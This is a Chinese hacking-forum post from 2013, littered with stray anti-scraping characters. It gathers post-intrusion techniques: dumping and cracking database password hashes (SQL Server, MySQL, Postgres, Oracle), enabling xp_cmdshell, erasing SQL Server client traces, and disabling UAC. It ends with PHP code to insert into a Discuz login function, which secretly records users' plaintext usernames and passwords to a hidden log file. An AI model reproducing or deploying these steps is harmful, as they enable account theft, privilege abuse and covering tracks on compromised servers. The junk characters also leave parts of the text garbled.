, y6 N0 Z+ L9 V+ u% _各种类型数据库抓HASH破解最高权限密码!, W1 e P8 ]! U q7 k2 S
1.sql server20003 Q, w+ l3 l7 x4 c
SELECT password from master.dbo.sysxlogins where name='sa'
) F- c2 J6 M& x) J0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
) h5 p9 i; p" e# t7 o; u K2FD54D6119FFF04129A1D72E7C3194F7284A7F3A, V& M3 l9 n* g# N
+ K9 ~& u. O% k; K1 d
0×0100- constant header5 l- [6 @5 d y- m, U. `; v
34767D5C- salt, a9 v( R, d0 m' { q5 A" ~
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
# w! N4 B5 |1 _: q6 V) c; |2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
7 g t/ K8 M8 B+ `+ Q/ F" \. z- I# lcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
- r: N o/ [) D, mSQL server 2005:-+ r r, }# q- Q# R' |! o9 R1 v
SELECT password_hash FROM sys.sql_logins where name='sa'- J7 {4 b" X& r
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F+ \' T4 Q: |) `5 Z, r
0×0100- constant header
! n! d7 f/ t/ f5 ^5 z993BF231-salt5 J; o w3 O' ?' a* h& R' g
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
* ?" c4 I4 M* w* K) Q3 `crack case sensitive hash in cain, try brute force and dictionary based attacks.
/ { q w& l$ T( V. l4 p" t3 P- |' e, ^7 ~0 B! V( n4 q) @" e& \
update:- following bernardo’s comments:-
5 q G% G' W, h5 m# U, Ouse function fn_varbintohexstr() to cast password in a hex string.
: Z. A! h( Z0 N) i8 ^% se.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
$ p; J& l4 k% C6 M3 a3 a; w, e# i9 D. r- q3 h" s4 c) v. @
MYSQL:-
! B3 l) u2 Y2 ?* B! i8 W( V5 ]
$ H% v2 ]! L8 m' D8 UIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2./ @+ {6 r8 Z9 O0 ~5 v
6 H. T" |2 T0 @, W1 W+ e
*mysql < 4.1
: |7 r7 @% M1 b0 ~5 M$ Y" K$ `5 J5 S2 ^ F( U3 _
mysql> SELECT PASSWORD(‘mypass’);8 w3 X8 R, Z) B+ j1 |) n
+——————–+
; i+ h% @5 I; K+ m3 @3 g0 m& h| PASSWORD(‘mypass’) |: L$ A3 Y! O5 A- o) L
+——————–+' Q- w' {! f W
| 6f8c114b58f2ce9e |
! G& _' y( P9 }1 z' ]/ x+——————–+
5 N8 L& q7 w( G, o: C/ |
6 x# B5 t' `7 q5 \: j8 b% o*mysql >=4.1
0 j% Y/ T6 J( t- f2 ?* p7 [5 v1 g4 G9 o- v9 J3 [. P2 }
mysql> SELECT PASSWORD(‘mypass’);% H5 Y, Z7 G4 X7 d
+——————————————-+ m) R6 h- Z0 H: y( E9 q
| PASSWORD(‘mypass’) |1 h5 o3 X, w) N0 ~7 @3 n
+——————————————-+) f' ?1 w4 p1 } Q3 \( ]9 K
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |0 f4 I3 K* m( n4 C6 b+ {
+——————————————-+
- N" }8 b$ s$ }3 F# k6 o7 @4 Y/ P" U" X
Select user, password from mysql.user
/ d( P+ m6 y: }; r9 y1 yThe hashes can be cracked in ‘cain and abel’6 z: r9 e% x$ Z ] D
) U" d0 ~1 \0 x% J& X
Postgres:-8 k& s6 ]" B) Z5 z4 |( L9 j
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* I# x8 L5 \1 O7 n, K$ _
select usename, passwd from pg_shadow;
`" s$ h, T/ N& }- a X+ ^usename | passwd" M; O- e* n/ s* L; G0 ]# U# {
——————+————————————-
3 y! k" ]; Y% X2 {7 {* I) V. U \testuser | md5fabb6d7172aadfda4753bf0507ed4396
' ^) h& j3 I* A2 l9 e, quse mdcrack to crack these hashes:-6 L; r6 N) @, x& @
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396' i/ V4 D4 S8 l
* Z7 D4 h2 Q) R+ @( {Oracle:-
* R, x6 K$ r1 V0 E7 L+ aselect name, password, spare4 from sys.user$
1 r2 B# r3 F8 S( u% s$ dhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
- }+ ~) h5 a3 R* {More on Oracle later, i am a bit bored….
% v/ L2 S, h& F$ J3 Z0 ?
$ x0 R1 g0 W/ x; H: r' l
$ K" ?/ o1 S" K; q* c在sql server2005/2008中开启xp_cmdshell
4 T: F6 F) D- }( N* k6 p. N6 S-- To allow advanced options to be changed./ @ g$ @( G( D2 V( o0 Y
EXEC sp_configure 'show advanced options', 1/ |5 s/ @! L0 v+ n
GO
{ E$ a( ]3 k1 o2 j-- To update the currently configured value for advanced options.* ` a- @ P: j1 g) x- G( Z
RECONFIGURE
5 C. T \5 f* v* {( { vGO5 |# l7 p: m/ H* `- n0 W# i8 h% L
-- To enable the feature.: V5 \' J7 J! G4 _3 s: [
EXEC sp_configure 'xp_cmdshell', 1' E3 n: _! H/ }
GO
0 D4 P9 T, I5 e& s3 }9 S-- To update the currently configured value for this feature.
4 |3 `* d5 k2 @. _# @; KRECONFIGURE
9 b. d# ]7 K5 ]GO7 E- F( [1 s3 n) w: q/ \
SQL 2008 server日志清除,在清楚前一定要备份。
. }0 B( t1 F" I6 Q* z3 [0 I如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:) ~) N5 N7 [7 j9 z1 ]$ V, P
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
3 Z) L4 Z# y3 {' B$ s
1 S* v4 ? Q0 a+ m4 m对于SQL Server 2008以前的版本:- K$ b% m/ R+ O' ~
SQL Server 2005:' M3 `( D `3 u& r! a9 r$ E: ~
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat# N1 X$ z1 B9 K% z& @
SQL Server 2000:
! ]* Q0 `0 L- Q& q, }! Y清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
* [. n4 ?: `) i# T$ b i, ~6 ]
# p4 H. C X4 G" e) \4 `5 M/ M, ]: k本帖最后由 simeon 于 2013-1-3 09:51 编辑! `3 E. y+ \; H& o- N6 V
7 O/ D4 ^$ L7 j' D' Z! a" j3 K# t' h0 O3 x
windows 2008 文件权限修改
* q! y2 P7 N, S% |: W+ d+ H: a' s1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx3 q0 D9 {0 ?% D% Y" d
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; Y1 n: O: |* a. W
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,9 @4 ^. \* T8 i0 z6 K
( r8 k! s0 \6 T5 xWindows Registry Editor Version 5.00
* ]2 M$ ~; j7 t! K; q; Z! F4 ^[HKEY_CLASSES_ROOT\*\shell\runas]
* O9 v1 L, J" O2 {6 s- k0 f@="管理员取得所有权"5 K. d1 ^# B( q8 n3 O7 r! S1 z
"NoWorkingDirectory"=""7 D: s( n, I: ]# W5 T
[HKEY_CLASSES_ROOT\*\shell\runas\command]5 G, [" y# u1 U1 W4 x* x$ N8 P
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, t% W9 L A' |: [0 ^"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 _: J) r2 g G* H4 `+ N# T2 n4 S Y4 T- z[HKEY_CLASSES_ROOT\exefile\shell\runas2]2 N4 C/ a0 W$ ]: ^* n) C
@="管理员取得所有权". j& o$ l% n! [$ ?# q% A- n
"NoWorkingDirectory"=""
) f' {7 P* s: q+ K1 B' X( y[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]5 Z# D: A- ~) w" F1 z7 }/ U
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 n: f% T4 ?: {' z1 U& n. T"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" n# I& |2 Z8 X6 i+ V+ h8 Z/ \$ v4 V [7 W, X
[HKEY_CLASSES_ROOT\Directory\shell\runas]
% _ u" Q0 |% m1 l@="管理员取得所有权"; P. V" v/ E' d/ N# x
"NoWorkingDirectory"=""& L. T ]8 l+ n
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
3 I( r; _- T$ a/ C@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
% T& f% ^* K2 Q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t": P: t9 F9 x& Q7 k# q. ^: V1 a7 w
" n' q7 Q/ N% H1 w6 O, R9 k
, L% m7 A; D: k) v. { F$ I' Gwin7右键“管理员取得所有权”.reg导入
- Y9 A! i6 y* m$ h* F. b4 s二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
1 W; |6 Q" \5 N* N& i* O( v2 k1、C:\Windows这个路径的“notepad.exe”不需要替换6 q5 z# z4 ?% T6 P5 x
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换5 T9 P, H) y; B) C5 z+ F* M! Q% U
3、四个“notepad.exe.mui”不要管
, q7 \# _1 z, I( y! y R: T4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和8 P/ y6 O5 w8 c0 ?% Y S. T% x/ c
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”5 z* m% _, k0 B3 f
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
: g2 E1 K/ C( B3 x$ k$ s替换完之后回到桌面,新建一个txt文档打开看看是不是变了。8 {% W( V ^0 p! H2 D& F
windows 2008中关闭安全策略: / R: k9 s/ Y, s% u) G
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9 {, v% O0 J6 D+ O
修改uc_client目录下的client.php 在
2 U @9 ^) u& k& t' v) pfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {- `) s d3 ~7 }) _
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
4 c7 w1 e7 u, a& V2 e% a/ l你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
# Y1 K, G. J" [6 xif(getenv('HTTP_CLIENT_IP')) {
6 v$ i- |( e4 [" o" @% n( E$onlineip = getenv('HTTP_CLIENT_IP');
3 S" S8 E Y+ D2 l' Z3 z} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
! H$ B0 L$ k: z+ v' I$onlineip = getenv('HTTP_X_FORWARDED_FOR');% `- o7 v6 D. f" S6 X: D
} elseif(getenv('REMOTE_ADDR')) {
3 ^0 j$ f' O3 Y$onlineip = getenv('REMOTE_ADDR');4 d G4 F9 L1 L+ |/ e. k! a- S
} else {
8 H' t0 J' c% l4 g% u: H% ?+ X& g# t$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];* B6 Y1 d; N5 U2 c3 c
}) S B1 U; F3 H2 f
$showtime=date("Y-m-d H:i:s");
7 h1 ]# V5 ~$ o( ^ $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
+ N( s, b/ c$ ]1 |- z $handle=fopen('./data/cache/csslog.php','a+');. n3 p4 |$ m' q$ {8 ?6 N. S( X( Y
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对